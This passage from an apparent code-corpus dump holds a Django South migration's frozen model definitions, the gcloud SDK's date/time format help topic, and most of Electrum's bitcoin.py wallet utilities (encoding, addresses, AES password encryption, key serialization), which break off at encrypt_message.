'personlite_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts_and_people.PersonLite']", 'unique': 'True', 'primary_key': 'True'}),
'please_contact': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'contact_for'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['contacts_and_people.Person']"}),
'precise_location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'blank': 'True'}),
'staff_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'person_user'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['auth.User']", 'blank': 'True', 'unique': 'True'})
},
'contacts_and_people.personlite': {
'Meta': {'object_name': 'PersonLite'},
'given_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'middle_names': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'surname': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts_and_people.Title']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'contacts_and_people.phonecontact': {
'Meta': {'ordering': "('label',)", 'object_name': 'PhoneContact'},
'area_code': ('django.db.models.fields.CharField', [], {'default': "'029'", 'max_length': '5'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'44'", 'max_length': '5'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_extension': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'contacts_and_people.site': {
'Meta': {'ordering': "('country', 'site_name', 'post_town')", 'object_name': 'Site'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post_town': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'site_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'contacts_and_people.title': {
'Meta': {'ordering': "['title']", 'object_name': 'Title'},
'abbreviation': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'filer.file': {
'Meta': {'object_name': 'File'},
'_file_size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'folder': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'all_files'", 'null': 'True', 'to': "orm['filer.Folder']"}),
'has_all_mandatory_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'original_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_files'", 'null': 'True', 'to': "orm['auth.User']"}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_filer.file_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'sha1': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40', 'blank': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'filer.folder': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('parent', 'name'),)", 'object_name': 'Folder'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'filer_owned_folders'", 'null': 'True', 'to': "orm['auth.User']"}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['filer.Folder']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'filer.image': {
'Meta': {'object_name': 'Image', '_ormbases': ['filer.File']},
'_height': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'_width': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'default_alt_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'file_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['filer.File']", 'unique': 'True', 'primary_key': 'True'}),
'must_always_publish_author_credit': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'must_always_publish_copyright': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'subject_location': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'})
},
'links.externallink': {
'Meta': {'ordering': "['title']", 'object_name': 'ExternalLink'},
'description': ('django.db.models.fields.TextField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'external_site': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'links'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalSite']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'links'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['links.LinkType']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'links.externalsite': {
'Meta': {'ordering': "['domain']", 'object_name': 'ExternalSite'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['links.ExternalSite']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'links.linktype': {
'Meta': {'object_name': 'LinkType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'scheme': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['arkestra_clinical_trials'] | bsd-2-clause | -6,084,172,808,788,019,000 | 99.023599 | 262 | 0.564131 | false |
KaranToor/MA450 | google-cloud-sdk/.install/.backup/lib/surface/topic/datetimes.py | 6 | 3921 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Date/time input format supplementary help."""
from googlecloudsdk.calliope import base
# NOTE: If the name of this topic is modified, please make sure to update all
# references to it in error messages and other help messages as there are no
# tests to catch such changes.
class DateTimes(base.TopicCommand):
"""Date/time input format supplementary help.
*gcloud* command line flags and filter expressions that expect date/time
string values support common input formats. These formats fall into two main
categories: absolute date/times and relative durations.
### Absolute date/time formats
Absolute date/time input formats minimally support
[ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) and
[RFC 822](https://www.ietf.org/rfc/rfc0822.txt) date/times. When omitted the
date/time value defaults are:
* year, month, day - current value
* hour, minute, second, fractional second - 0
The supported absolute date/time input formats are listed here.
ISO 8601 / RFC 3339 zulu:
2003-09-25T10:49:41.519Z
2003-09-25T10:49:41Z
ISO 8601 numeric timezone offset:
2003-09-25T10:49:41.5-0000
2003-09-25T10:49:41.5-03:00
2003-09-25T10:49:41.5+0300
ISO with omitted parts:
2003-09-25T10:49:41
2003-09-25T10:49
2003-09-25T10
2003-09-25
RFC 822:
Thu, 25 Sep 2003 10:49:41 -0300
UNIX date command, explicit timezone:
Thu Sep 25 10:36:28 EDT 2003
2003 10:36:28 EDT 25 Sep Thu
local timezone:
Thu Sep 25 10:36:28 2003
omitted parts (date parts default to the current date, time parts default
to 0):
Thu Sep 25 10:36:28
Thu Sep 10:36:28
Thu 10:36:28
Thu 10:36
10:36
omitted parts with different order:
Thu Sep 25 2003
Sep 25 2003
Sep 2003
Sep
2003
ISO no separators:
20030925T104941.5-0300
20030925T104941-0300
20030925T104941
20030925T1049
20030925T10
20030925
no T separator:
20030925104941
200309251049
other date orderings:
2003-09-25
2003-Sep-25
25-Sep-2003
Sep-25-2003
09-25-2003
other date separators:
2003.Sep.25
2003/09/25
2003 Sep 25
2003 09 25
### Relative duration date/time formats
Relative durations are based on
[ISO 8601 durations](https://en.wikipedia.org/wiki/ISO_8601#Durations).
Relative durations are case-insensitive and must be prefixed with +P or -P.
They denote offsets from the current time.
A fully qualified duration string contains year, month, day, hour, minute,
second, and fractional second parts. Each part is a number followed by a
single character suffix:
* P - period (the duration designator)
* Y - year
* M - minute if after T or H, month otherwise
* D - day
* T - separates date parts from time parts
* H - hour
* M - minute if after T or H, month otherwise
* S - second (for fractional seconds, use decimal value for seconds)
At least one part must be specified. Omitted parts default to 0.
-P1Y2M3DT4H5M6.7S
+p1y2m3dT4h5m6.7s
A relative duration may be used in any context that expects a date/time
string.
For example:
* 1 month ago: -p1m
* 30 minutes from now: +pt30m
* 2 hours and 30 minutes ago: -p2h30m
"""
| apache-2.0 | 228,429,009,810,225,250 | 24.796053 | 78 | 0.694211 | false |
romanz/electrum | lib/bitcoin.py | 1 | 33211 | # -*- coding: utf-8 -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
import base64
import hmac
import os
import json
import ecdsa
import pyaes
from .util import bfh, bh2u, to_string
from . import version
from .util import print_error, InvalidPassword, assert_bytes, to_bytes, inv_dict
from . import segwit_addr
def read_json(filename, default):
path = os.path.join(os.path.dirname(__file__), filename)
try:
with open(path, 'r') as f:
r = json.loads(f.read())
except:
r = default
return r
class NetworkConstants:
@classmethod
def set_mainnet(cls):
cls.TESTNET = False
cls.WIF_PREFIX = 0x80
cls.ADDRTYPE_P2PKH = 0
cls.ADDRTYPE_P2SH = 5
cls.SEGWIT_HRP = "bc"
cls.GENESIS = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f"
cls.DEFAULT_PORTS = {'t': '50001', 's': '50002'}
cls.DEFAULT_SERVERS = read_json('servers.json', {})
cls.CHECKPOINTS = read_json('checkpoints.json', [])
cls.XPRV_HEADERS = {
'standard': 0x0488ade4, # xprv
'p2wpkh-p2sh': 0x049d7878, # yprv
'p2wsh-p2sh': 0x0295b005, # Yprv
'p2wpkh': 0x04b2430c, # zprv
'p2wsh': 0x02aa7a99, # Zprv
}
cls.XPUB_HEADERS = {
'standard': 0x0488b21e, # xpub
'p2wpkh-p2sh': 0x049d7cb2, # ypub
'p2wsh-p2sh': 0x0295b43f, # Ypub
'p2wpkh': 0x04b24746, # zpub
'p2wsh': 0x02aa7ed3, # Zpub
}
@classmethod
def set_testnet(cls):
cls.TESTNET = True
cls.WIF_PREFIX = 0xef
cls.ADDRTYPE_P2PKH = 111
cls.ADDRTYPE_P2SH = 196
cls.SEGWIT_HRP = "tb"
cls.GENESIS = "000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943"
cls.DEFAULT_PORTS = {'t':'51001', 's':'51002'}
cls.DEFAULT_SERVERS = read_json('servers_testnet.json', {})
cls.CHECKPOINTS = read_json('checkpoints_testnet.json', [])
cls.XPRV_HEADERS = {
'standard': 0x04358394, # tprv
'p2wpkh-p2sh': 0x044a4e28, # uprv
'p2wsh-p2sh': 0x024285b5, # Uprv
'p2wpkh': 0x045f18bc, # vprv
'p2wsh': 0x02575048, # Vprv
}
cls.XPUB_HEADERS = {
'standard': 0x043587cf, # tpub
'p2wpkh-p2sh': 0x044a5262, # upub
'p2wsh-p2sh': 0x024285ef, # Upub
'p2wpkh': 0x045f1cf6, # vpub
'p2wsh': 0x02575483, # Vpub
}
NetworkConstants.set_mainnet()
################################## transactions
COINBASE_MATURITY = 100
COIN = 100000000
# supported types of transction outputs
TYPE_ADDRESS = 0
TYPE_PUBKEY = 1
TYPE_SCRIPT = 2
# AES encryption
try:
from Cryptodome.Cipher import AES
except:
AES = None
class InvalidPadding(Exception):
pass
def append_PKCS7_padding(data):
assert_bytes(data)
padlen = 16 - (len(data) % 16)
return data + bytes([padlen]) * padlen
def strip_PKCS7_padding(data):
assert_bytes(data)
if len(data) % 16 != 0 or len(data) == 0:
raise InvalidPadding("invalid length")
padlen = data[-1]
if padlen > 16:
raise InvalidPadding("invalid padding byte (large)")
for i in data[-padlen:]:
if i != padlen:
raise InvalidPadding("invalid padding byte (inconsistent)")
return data[0:-padlen]
def aes_encrypt_with_iv(key, iv, data):
assert_bytes(key, iv, data)
data = append_PKCS7_padding(data)
if AES:
e = AES.new(key, AES.MODE_CBC, iv).encrypt(data)
else:
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Encrypter(aes_cbc, padding=pyaes.PADDING_NONE)
e = aes.feed(data) + aes.feed() # empty aes.feed() flushes buffer
return e
def aes_decrypt_with_iv(key, iv, data):
assert_bytes(key, iv, data)
if AES:
cipher = AES.new(key, AES.MODE_CBC, iv)
data = cipher.decrypt(data)
else:
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Decrypter(aes_cbc, padding=pyaes.PADDING_NONE)
data = aes.feed(data) + aes.feed() # empty aes.feed() flushes buffer
try:
return strip_PKCS7_padding(data)
except InvalidPadding:
raise InvalidPassword()
def EncodeAES(secret, s):
assert_bytes(s)
iv = bytes(os.urandom(16))
ct = aes_encrypt_with_iv(secret, iv, s)
e = iv + ct
return base64.b64encode(e)
def DecodeAES(secret, e):
e = bytes(base64.b64decode(e))
iv, e = e[:16], e[16:]
s = aes_decrypt_with_iv(secret, iv, e)
return s
def pw_encode(s, password):
if password:
secret = Hash(password)
return EncodeAES(secret, to_bytes(s, "utf8")).decode('utf8')
else:
return s
def pw_decode(s, password):
if password is not None:
secret = Hash(password)
try:
d = to_string(DecodeAES(secret, s), "utf8")
except Exception:
raise InvalidPassword()
return d
else:
return s
def rev_hex(s):
return bh2u(bfh(s)[::-1])
def int_to_hex(i, length=1):
assert isinstance(i, int)
s = hex(i)[2:].rstrip('L')
s = "0"*(2*length - len(s)) + s
return rev_hex(s)
def var_int(i):
# https://en.bitcoin.it/wiki/Protocol_specification#Variable_length_integer
if i<0xfd:
return int_to_hex(i)
elif i<=0xffff:
return "fd"+int_to_hex(i,2)
elif i<=0xffffffff:
return "fe"+int_to_hex(i,4)
else:
return "ff"+int_to_hex(i,8)
def op_push(i):
if i<0x4c:
return int_to_hex(i)
elif i<0xff:
return '4c' + int_to_hex(i)
elif i<0xffff:
return '4d' + int_to_hex(i,2)
else:
return '4e' + int_to_hex(i,4)
def push_script(x):
return op_push(len(x)//2) + x
def sha256(x):
x = to_bytes(x, 'utf8')
return bytes(hashlib.sha256(x).digest())
def Hash(x):
x = to_bytes(x, 'utf8')
out = bytes(sha256(sha256(x)))
return out
hash_encode = lambda x: bh2u(x[::-1])
hash_decode = lambda x: bfh(x)[::-1]
hmac_sha_512 = lambda x, y: hmac.new(x, y, hashlib.sha512).digest()
def is_new_seed(x, prefix=version.SEED_PREFIX):
from . import mnemonic
x = mnemonic.normalize_text(x)
s = bh2u(hmac_sha_512(b"Seed version", x.encode('utf8')))
return s.startswith(prefix)
def is_old_seed(seed):
from . import old_mnemonic, mnemonic
seed = mnemonic.normalize_text(seed)
words = seed.split()
try:
# checks here are deliberately left weak for legacy reasons, see #3149
old_mnemonic.mn_decode(words)
uses_electrum_words = True
except Exception:
uses_electrum_words = False
try:
seed = bfh(seed)
is_hex = (len(seed) == 16 or len(seed) == 32)
except Exception:
is_hex = False
return is_hex or (uses_electrum_words and (len(words) == 12 or len(words) == 24))
def seed_type(x):
if is_old_seed(x):
return 'old'
elif is_new_seed(x):
return 'standard'
elif is_new_seed(x, version.SEED_PREFIX_SW):
return 'segwit'
elif is_new_seed(x, version.SEED_PREFIX_2FA):
return '2fa'
return ''
is_seed = lambda x: bool(seed_type(x))
# pywallet openssl private key implementation
def i2o_ECPublicKey(pubkey, compressed=False):
# public keys are 65 bytes long (520 bits)
# 0x04 + 32-byte X-coordinate + 32-byte Y-coordinate
# 0x00 = point at infinity, 0x02 and 0x03 = compressed, 0x04 = uncompressed
# compressed keys: <sign> <x> where <sign> is 0x02 if y is even and 0x03 if y is odd
if compressed:
if pubkey.point.y() & 1:
key = '03' + '%064x' % pubkey.point.x()
else:
key = '02' + '%064x' % pubkey.point.x()
else:
key = '04' + \
'%064x' % pubkey.point.x() + \
'%064x' % pubkey.point.y()
return bfh(key)
# end pywallet openssl private key implementation
############ functions from pywallet #####################
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(sha256(public_key))
return md.digest()
except BaseException:
from . import ripemd
md = ripemd.new(sha256(public_key))
return md.digest()
def hash160_to_b58_address(h160, addrtype, witness_program_version=1):
s = bytes([addrtype])
s += h160
return base_encode(s+Hash(s)[0:4], base=58)
def b58_address_to_hash160(addr):
addr = to_bytes(addr, 'ascii')
_bytes = base_decode(addr, 25, base=58)
return _bytes[0], _bytes[1:21]
def hash160_to_p2pkh(h160):
return hash160_to_b58_address(h160, NetworkConstants.ADDRTYPE_P2PKH)
def hash160_to_p2sh(h160):
return hash160_to_b58_address(h160, NetworkConstants.ADDRTYPE_P2SH)
def public_key_to_p2pkh(public_key):
return hash160_to_p2pkh(hash_160(public_key))
def hash_to_segwit_addr(h):
return segwit_addr.encode(NetworkConstants.SEGWIT_HRP, 0, h)
def public_key_to_p2wpkh(public_key):
return hash_to_segwit_addr(hash_160(public_key))
def script_to_p2wsh(script):
return hash_to_segwit_addr(sha256(bfh(script)))
def p2wpkh_nested_script(pubkey):
pkh = bh2u(hash_160(bfh(pubkey)))
return '00' + push_script(pkh)
def p2wsh_nested_script(witness_script):
wsh = bh2u(sha256(bfh(witness_script)))
return '00' + push_script(wsh)
def pubkey_to_address(txin_type, pubkey):
if txin_type == 'p2pkh':
return public_key_to_p2pkh(bfh(pubkey))
elif txin_type == 'p2wpkh':
return hash_to_segwit_addr(hash_160(bfh(pubkey)))
elif txin_type == 'p2wpkh-p2sh':
scriptSig = p2wpkh_nested_script(pubkey)
return hash160_to_p2sh(hash_160(bfh(scriptSig)))
else:
raise NotImplementedError(txin_type)
def redeem_script_to_address(txin_type, redeem_script):
if txin_type == 'p2sh':
return hash160_to_p2sh(hash_160(bfh(redeem_script)))
elif txin_type == 'p2wsh':
return script_to_p2wsh(redeem_script)
elif txin_type == 'p2wsh-p2sh':
scriptSig = p2wsh_nested_script(redeem_script)
return hash160_to_p2sh(hash_160(bfh(scriptSig)))
else:
raise NotImplementedError(txin_type)
def script_to_address(script):
from .transaction import get_address_from_output_script
t, addr = get_address_from_output_script(bfh(script))
assert t == TYPE_ADDRESS
return addr
def address_to_script(addr):
witver, witprog = segwit_addr.decode(NetworkConstants.SEGWIT_HRP, addr)
if witprog is not None:
assert (0 <= witver <= 16)
OP_n = witver + 0x50 if witver > 0 else 0
script = bh2u(bytes([OP_n]))
script += push_script(bh2u(bytes(witprog)))
return script
addrtype, hash_160 = b58_address_to_hash160(addr)
if addrtype == NetworkConstants.ADDRTYPE_P2PKH:
script = '76a9' # op_dup, op_hash_160
script += push_script(bh2u(hash_160))
script += '88ac' # op_equalverify, op_checksig
elif addrtype == NetworkConstants.ADDRTYPE_P2SH:
script = 'a9' # op_hash_160
script += push_script(bh2u(hash_160))
script += '87' # op_equal
else:
raise BaseException('unknown address type')
return script
def address_to_scripthash(addr):
script = address_to_script(addr)
return script_to_scripthash(script)
def script_to_scripthash(script):
h = sha256(bytes.fromhex(script))[0:32]
return bh2u(bytes(reversed(h)))
def public_key_to_p2pk_script(pubkey):
script = push_script(pubkey)
script += 'ac' # op_checksig
return script
__b58chars = b'123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
assert len(__b58chars) == 58
__b43chars = b'0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$*+-./:'
assert len(__b43chars) == 43
def base_encode(v, base):
""" encode v, which is a string of bytes, to base58."""
assert_bytes(v)
assert base in (58, 43)
chars = __b58chars
if base == 43:
chars = __b43chars
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * c
result = bytearray()
while long_value >= base:
div, mod = divmod(long_value, base)
result.append(chars[mod])
long_value = div
result.append(chars[long_value])
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == 0x00:
nPad += 1
else:
break
result.extend([chars[0]] * nPad)
result.reverse()
return result.decode('ascii')
def base_decode(v, length, base):
""" decode v into a string of len bytes."""
# assert_bytes(v)
v = to_bytes(v, 'ascii')
assert base in (58, 43)
chars = __b58chars
if base == 43:
chars = __b43chars
long_value = 0
for (i, c) in enumerate(v[::-1]):
long_value += chars.find(bytes([c])) * (base**i)
result = bytearray()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result.append(mod)
long_value = div
result.append(long_value)
nPad = 0
for c in v:
if c == chars[0]:
nPad += 1
else:
break
result.extend(b'\x00' * nPad)
if length is not None and len(result) != length:
return None
result.reverse()
return bytes(result)
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return base_encode(vchIn + hash[0:4], base=58)
def DecodeBase58Check(psz):
vchRet = base_decode(psz, None, base=58)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
# backwards compat
# extended WIF for segwit (used in 3.0.x; but still used internally)
SCRIPT_TYPES = {
'p2pkh':0,
'p2wpkh':1,
'p2wpkh-p2sh':2,
'p2sh':5,
'p2wsh':6,
'p2wsh-p2sh':7
}
def serialize_privkey(secret, compressed, txin_type, internal_use=False):
if internal_use:
prefix = bytes([(SCRIPT_TYPES[txin_type] + NetworkConstants.WIF_PREFIX) & 255])
else:
prefix = bytes([NetworkConstants.WIF_PREFIX])
suffix = b'\01' if compressed else b''
vchIn = prefix + secret + suffix
base58_wif = EncodeBase58Check(vchIn)
if internal_use:
return base58_wif
else:
return '{}:{}'.format(txin_type, base58_wif)
def deserialize_privkey(key):
if is_minikey(key):
return 'p2pkh', minikey_to_private_key(key), True
txin_type = None
if ':' in key:
txin_type, key = key.split(sep=':', maxsplit=1)
assert txin_type in SCRIPT_TYPES
vch = DecodeBase58Check(key)
if not vch:
raise BaseException("cannot deserialize", key)
if txin_type is None:
# keys exported in version 3.0.x encoded script type in first byte
txin_type = inv_dict(SCRIPT_TYPES)[vch[0] - NetworkConstants.WIF_PREFIX]
else:
assert vch[0] == NetworkConstants.WIF_PREFIX
assert len(vch) in [33, 34]
compressed = len(vch) == 34
return txin_type, vch[1:33], compressed
def regenerate_key(pk):
assert len(pk) == 32
return EC_KEY(pk)
def GetPubKey(pubkey, compressed=False):
return i2o_ECPublicKey(pubkey, compressed)
def GetSecret(pkey):
return bfh('%064x' % pkey.secret)
def is_compressed(sec):
return deserialize_privkey(sec)[2]
def public_key_from_private_key(pk, compressed):
pkey = regenerate_key(pk)
public_key = GetPubKey(pkey.pubkey, compressed)
return bh2u(public_key)
def address_from_private_key(sec):
txin_type, privkey, compressed = deserialize_privkey(sec)
public_key = public_key_from_private_key(privkey, compressed)
return pubkey_to_address(txin_type, public_key)
def is_segwit_address(addr):
try:
witver, witprog = segwit_addr.decode(NetworkConstants.SEGWIT_HRP, addr)
except Exception as e:
return False
return witprog is not None
def is_b58_address(addr):
try:
addrtype, h = b58_address_to_hash160(addr)
except Exception as e:
return False
if addrtype not in [NetworkConstants.ADDRTYPE_P2PKH, NetworkConstants.ADDRTYPE_P2SH]:
return False
return addr == hash160_to_b58_address(h, addrtype)
def is_address(addr):
return is_segwit_address(addr) or is_b58_address(addr)
def is_private_key(key):
try:
k = deserialize_privkey(key)
return k is not False
except:
return False
########### end pywallet functions #######################
def is_minikey(text):
# Minikeys are typically 22 or 30 characters, but this routine
# permits any length of 20 or more provided the minikey is valid.
# A valid minikey must begin with an 'S', be in base58, and when
# suffixed with '?' have its SHA256 hash begin with a zero byte.
# They are widely used in Casascius physical bitcoins.
return (len(text) >= 20 and text[0] == 'S'
and all(ord(c) in __b58chars for c in text)
and sha256(text + '?')[0] == 0x00)
def minikey_to_private_key(text):
return sha256(text)
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
from ecdsa.curves import SECP256k1
from ecdsa.ellipticcurve import Point
from ecdsa.util import string_to_number, number_to_string
def msg_magic(message):
length = bfh(var_int(len(message)))
return b"\x18Bitcoin Signed Message:\n" + length + message
def verify_message(address, sig, message):
assert_bytes(sig, message)
try:
h = Hash(msg_magic(message))
public_key, compressed = pubkey_from_signature(sig, h)
# check public key using the address
pubkey = point_to_ser(public_key.pubkey.point, compressed)
for txin_type in ['p2pkh','p2wpkh','p2wpkh-p2sh']:
addr = pubkey_to_address(txin_type, bh2u(pubkey))
if address == addr:
break
else:
raise Exception("Bad signature")
# check message
public_key.verify_digest(sig[1:], h, sigdecode = ecdsa.util.sigdecode_string)
return True
except Exception as e:
print_error("Verification error: {0}".format(e))
return False
def encrypt_message(message, pubkey, magic=b'BIE1'):
